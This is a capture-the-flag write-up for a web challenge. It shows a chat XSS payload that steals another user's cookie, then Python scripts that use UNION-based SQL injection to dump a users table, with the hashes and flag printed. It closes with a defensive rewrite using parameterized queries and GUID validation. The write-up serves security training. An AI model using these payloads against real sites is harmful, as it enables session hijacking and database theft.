Oui, Key Leaks
Flag: ECW{M4stery_Of_All_T3chniques_gg}
Challenge
This challenge runs in a Docker container and is not available.
Solution
Accessing the site
To access the site you need the cookie magic_cookie=investigator. It can be seen in the page's source code:

Removing the ads (comfort)
Well, the popups every 5 seconds are pretty annoying.

In the file /js/ads.js we find the premium cookie, which must be set to "true" to stop them.

XSS
The site has a chat feature. Received messages are injected directly into the HTML through the innerHTML property, so this is where we can inject elements that will be interpreted and thus execute JS.

So as soon as another user connects, we leak their cookies by sending the payload:
<img src=x onerror="socket.emit('message', document.cookie)"/>
We now have the cookie: guid=51af8760-3cbf-4344-bcba-7f142d3157e7
We reach the admin panel by clicking the site title.

On the /admin panel we can view the server logs. We analyze them with an LLM to go faster.


New endpoint: /admin/notes.txt. There we find part of the server's code, and it is vulnerable.
TODO :
Gotta implement some temporary validation dor investigators : done
Using rev nginx : done
SQL is so easy : yes
No time for guid validation with nginx, todo later
Make admins able to change password : done
email notifs: done
Dark Light themes : useless really + web dev, won't do
Rebrand to something else than Oui Key Leaks like idk... The Pi rat's babe or something, sounds good
______________________________________________ What to do if you are under investigation __________________________________________________
If you are under investigation, the first step is to contact a lawyer immediately.
Avoid speaking to the police or signing any documents without legal advice.
A lawyer can help manage the situation and prevent it from worsening.
They can also conduct their own investigation to uncover evidence that might prove your innocence.
It is crucial to act quickly, as certain avenues of investigation may close once you are charged.
Understanding your legal rights and ensuring you do not make any incriminating mistakes is essential.
_______________________________________________ How to find a good lawyer __________________________________________
Finding a good lawyer involves several steps to ensure you find someone who can effectively handle your legal needs. First, consider the type of legal services you require and whether you need a general practice attorney or a specialist in a specific area of law.
Personal referrals from friends, family, or colleagues who have faced similar legal issues can provide valuable insights into a lawyer's competence and communication style.
Additionally, you can consult with your local or state bar association, which often provides lawyer referral services.
Online resources like Avvo and Lexpert offer directories of lawyers with client reviews, bar data, disciplinary records, and peer endorsements, allowing you to research potential candidates.
These directories can help you narrow down your choices based on practice area and location.
TODO eventually :
Test security, especially the guid cookie, I hard vibed that code a little too hard maybe
Buy new coffee machine
I should try OSCP, I'm good at security
I should check if the guid is valid instead of simply checking if the user has a guid set
Check again if I successfully deleted all illegal files from server
Base64: J1lvdSdyZSBvbiB0aGUgcmlnaHQgcGF0aCwgZW5qb3lpbmcgdGhlIGNoYWxsIHNvIGZhciA/IExldCBtZSBrbm93IG9uIERpc2NvcmQgOyknIElsbF9MYWtlIG9yIE5vZHJvZyBOYW1lZXJm
my slapped code to be reworked :
<?php
header("Content-Type: application/json");
require_once '../config/config.php'; // PDO connection

// Check if guid is present
if (isset($_COOKIE['guid'])) {
    $guid = $_COOKIE['guid'];
    $query = "SELECT name, secret FROM users WHERE guid = '$guid'";
    $result = $pdo->query($query);
    $userData = $result->fetch(PDO::FETCH_ASSOC);
    if ($userData) {
        echo json_encode([
            "success" => true,
            "name" => $userData['name'],
            "secret" => $userData['secret']
        ]);
    } else {
        echo json_encode(["success" => false, "message" => "Unknown GUID"]);
    }
} else {
    echo json_encode(["success" => false, "message" => "No guid found..."]);
}
?>
TODO also, make sure nobody can see this file

SQL Injection
To use the function whose code we now know, we go to /admin/api/user.php. It can be spotted in the requests made by the site, and by comparing the response with what the code is supposed to return (a JSON containing the user's info).

We inject it to retrieve the names of all the columns.
import requests

HOST = "challenges.challenge-ecw.eu"
PORT = 34993
URL = f"http://{HOST}:{PORT}"


def inject(payload):
    # The payload is sent as the guid cookie that /admin/api/user.php concatenates into its query
    cookies = {"guid": payload}
    response = requests.get(f"{URL}/admin/api/user.php", cookies=cookies).json()
    return None if not response["success"] else response


print(inject("' UNION SELECT 1,GROUP_CONCAT(0x7c,column_name,0x7C) FROM information_schema.columns WHERE table_name='users' #"))

{'success': True, 'name': '1', 'secret': '|USER|,|CURRENT_CONNECTIONS|,|TOTAL_CONNECTIONS|,|id|,|name|,|password_hash|,|guid|,|secret|,|email|,|email_notifications|,|created_at|'}

And now, let's dump the whole table:
import requests

HOST = "challenges.challenge-ecw.eu"
PORT = 34993
URL = f"http://{HOST}:{PORT}"


def inject(payload):
    # Same helper as above: the payload travels in the guid cookie
    cookies = {"guid": payload}
    response = requests.get(f"{URL}/admin/api/user.php", cookies=cookies).json()
    return None if not response["success"] else response


# Walk the users table one row at a time until the endpoint reports no match
i = 0
while True:
    data = inject(f"' UNION SELECT CONCAT(id,'|',name,'|',password_hash,'|',guid,'|',secret,'|',email,'|',email_notifications),1 FROM users LIMIT 1 OFFSET {i} #")
    if data is None:
        break
    print(f"[{i: >2}] {data}")
    i += 1

[ 0] {'success': True, 'name': '1|John "Bulldog" McCallister|$2y$10$ipPMkhDUiTLrFBkhBiOTOu69zLax36uWgNUfEs029lNR4w1eH6GgO|f05b824d-a5f2-4380-85b5-df075a36b2f2|Always beware of coincidences.|[email protected]|1', 'secret': '1'}
[ 1] {'success': True, 'name': '2|Sarah "Shadow" Thompson|$2y$10$ipPMkhDUiTLrFBkhBiOTOu69zLax36uWgCAfEs029lNR4w1eH6GgO|f17723cf-4d99-46d4-987d-72161cad37db|An unlit cigarette tells as much as a witness.|[email protected]|1', 'secret': '1'}
[ 2] {'success': True, 'name': '3|Frank Ramirez|$2y$10$ipPMkhDUiTLrFBkhBiOTOb54zLax36uWgNUfEs029lNR4w1eH6GgO|51af8760-3cbf-4344-bcba-7f142d3157e7|The perfect crime does not exist. Only inattentive cops.|[email protected]|1', 'secret': '1'}
[ 3] {'success': True, 'name': '4|Lisa "Fox" Bennett|$2y$10$zKk2Mf5Du87d9vTA9u691.v8KZfWWiCoKf7iMoG5QC5Mv4USUCaoO|ec88110c-0f24-410f-a900-5d2ef92325bf|Q2hhbGxlbmdlIG1hZGUgd2l0aCBsb3ZlIGJ5IElsbF9MYWtlIDsp|[email protected]|1', 'secret': '1'}
[ 4] {'success': True, 'name': '5|Mike "Rust" Calloway|$2y$10$Vtz8.73vr3CE4LqSoNdGS.wNk12OFxT/fYOdqGBDoyDZthX7Qk1Tq|5f48101b-a80c-495c-acda-0af9acb096a9|Everybody lies. Except the dead.|[email protected]|1', 'secret': '1'}
[ 5] {'success': True, 'name': '6|Olivia "Ice" Carter|$2y$10$SQDfu2ELK5dLWiSwrKyfnuZbHlc9UtOrb9CtV8dZP4Hqft6Gs0Yxa|eaa8424e-036c-408b-a53e-97e7b6daa96e|When a suspect smiles, they are either innocent or very guilty.|[email protected]|1', 'secret': '1'}
[ 6] {'success': True, 'name': '7|David "Eagle" Hunt|$2y$10$5BAizbuTJ6bbsRUNzx3GQeQzQKRYfw11g/3MxoqjBx0WKR99oYm3y|8e4d47de-6510-4766-86d8-f22dc7adf073|Truth is just a matter of perspective.|[email protected]|1', 'secret': '1'}
[ 7] {'success': True, 'name': '8|Vincent "Old Dog" Marconi|$2y$10$rP/wBG44Ll7yqg0TtgewjOhwDJJNqWVwVbdnwz0B5XXoqk.Iku.dG|af169487-9e4b-4efa-8819-0f4eb6708ef8|Modern criminals make digital mistakes.|[email protected]|1', 'secret': '1'}
[ 8] {'success': True, 'name': '9|Emma "Torch" Sinclair|$2y$10$30pQ1VLUPT2Dv6tGyxuXtui/5PJfIkxzbWEl1JtnJ6Mk6MB5BOlI2|247c2be7-d1d0-453f-aaa6-bfaed5263318|Shadows talk. You just need to know how to listen.|[email protected]|1', 'secret': '1'}
[ 9] {'success': True, 'name': '10|Rick "Grim" Holloway|$2y$10$QrJoRuJQN7sWvhpYCuYfduy.UMdUdquF0.O6xcsRtxS11m5RMwaaS|78a640a6-457a-4d3c-8ba7-ecfaa8a1bfc8|The best clues are the ones you do not want to see.|[email protected]|1', 'secret': '1'}
[10] {'success': True, 'name': '11|Luniaj Ensagas - Admin|ECW{M4stery_Of_All_T3chniques_gg}|2a4b62d9-7a4c-4938-9f97-1337cafebabe| (proudly) I always hide my flags is my db password fields !|[email protected]|1', 'secret': '1'}

The flag is in the last user, in the password_hash column.
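The root cause, both in the notes.txt PHP above and in the injection just run, is that the raw guid cookie is concatenated into the SQL string, and the author's own TODO ("check if the guid is valid instead of simply checking if the user has a guid set") was never done. The following is an added example, not code from the challenge or this writeup: it rebuilds the lookup in Python against an in-memory SQLite table with constructed rows (names, hashes and GUIDs are made up), reproduces the vulnerable concatenation, and places it beside a hardened version that validates the cookie's shape and binds it as a query parameter. The function names, the sample data and the UUID regular expression are this example's own assumptions.

```python
import re
import sqlite3

# Constructed sample rows standing in for the challenge's users table.
# Hashes and GUIDs are placeholders, not values from the challenge.
SAMPLE_USERS = [
    (1, "alice", "$2y$10$PLACEHOLDER_HASH_A", "11111111-2222-4333-8444-555555555555", "secret A"),
    (2, "admin", "FLAG{placeholder}", "aaaaaaaa-bbbb-4ccc-8ddd-eeeeeeeeeeee", "secret B"),
]

# Shape check for a GUID: 8-4-4-4-12 hex groups. Anything else (quotes, spaces,
# SQL keywords) is rejected before it gets anywhere near the database.
UUID_RE = re.compile(
    r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.IGNORECASE
)


def make_db():
    """Create the in-memory table the examples query."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER, name TEXT, password_hash TEXT, guid TEXT, secret TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def _as_response(row):
    if row:
        return {"success": True, "name": row[0], "secret": row[1]}
    return {"success": False, "message": "Unknown GUID"}


def lookup_vulnerable(conn, guid):
    """Mirror of the notes.txt PHP: the cookie value is spliced into the SQL text."""
    query = f"SELECT name, secret FROM users WHERE guid = '{guid}'"
    return _as_response(conn.execute(query).fetchone())


def lookup_parameterized(conn, guid):
    """Parameter binding alone: the driver passes the value as data, never as SQL."""
    row = conn.execute("SELECT name, secret FROM users WHERE guid = ?", (guid,)).fetchone()
    return _as_response(row)


def lookup_hardened(conn, guid):
    """Validation plus binding: malformed cookies are rejected with a distinct
    message, which also makes injection attempts stand out in the logs."""
    if not isinstance(guid, str) or not UUID_RE.fullmatch(guid):
        return {"success": False, "message": "Invalid GUID"}
    return lookup_parameterized(conn, guid)


if __name__ == "__main__":
    db = make_db()
    # A UNION payload of the same shape as the one used in the writeup, adapted
    # to SQLite's "--" comment syntax.
    payload = "' UNION SELECT name, password_hash FROM users WHERE id = 2 --"
    print("vulnerable   :", lookup_vulnerable(db, payload))
    print("parameterized:", lookup_parameterized(db, payload))
    print("hardened     :", lookup_hardened(db, payload))
    print("legit cookie :", lookup_hardened(db, "11111111-2222-4333-8444-555555555555"))
```

With the concatenated query the UNION payload hands back the admin's password_hash column as if it were the secret; with the bound parameter the same string is simply an unknown GUID, and with the shape check it never reaches the query at all. Note what the fix does not cover: a GUID is a bearer credential, so a syntactically valid one stolen through the chat XSS still logs in as its owner. Marking the guid cookie HttpOnly keeps document.cookie from exposing it to injected script, and escaping chat messages (or assigning them via textContent instead of innerHTML) removes the injection point itself.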